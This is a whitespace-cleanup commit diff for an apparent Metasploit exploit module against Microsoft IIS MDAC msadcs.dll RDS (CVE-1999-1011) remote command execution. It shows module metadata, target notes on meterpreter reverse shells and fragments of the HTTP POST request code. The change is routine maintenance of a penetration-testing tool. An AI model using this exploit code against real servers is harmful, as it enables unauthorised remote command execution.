Remove whitespace

unstable
sinn3r 2012-06-06 11:10:05 -05:00
parent bedfd6f9eb
commit 6d0dbcb106
1 changed files with 36 additions and 44 deletions

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize
super(
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
'Description' => %q{
This module can be used to execute arbitrary commands on IIS servers
that expose the /msadc/msadcs.dll Microsoft Data Access Components
@ -39,18 +35,17 @@ class Metasploit3 < Msf::Exploit::Remote
and useful for debugging. Also set NAME to obtain the remote hostname,
and METHOD to use the alternative VbBusObj technique.
},
'Author' => 'patrick',
'Version' => '$Revision$',
'Platform' => 'win',
'References' =>
'Author' => 'patrick',
'Platform' => 'win',
'References' =>
[
['OSVDB', '272'],
['BID', '529'],
['CVE', '1999-1011'],
['MSB', 'ms98-004'],
['MSB', 'ms99-025'],
['MSB', 'ms99-025']
],
'Targets' =>
'Targets' =>
[
# patrickw tested meterpreter OK 20120601
# nt4server w/sp3, ie4.02, option pack, IIS4.0, mdac 1.5, over msaccess shell, reverse_nonx
@ -140,10 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Content-Length' => data.length,
'Connection' => "Keep-Alive",
},
'method' => 'POST',
'data' => data,
})
response = Rex::Text.to_ascii(res.body, 'utf-16be')
@ -214,7 +207,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Content-Length' => data.length,
'Connection' => "Keep-Alive",
},
'method' => 'POST',
'data' => data,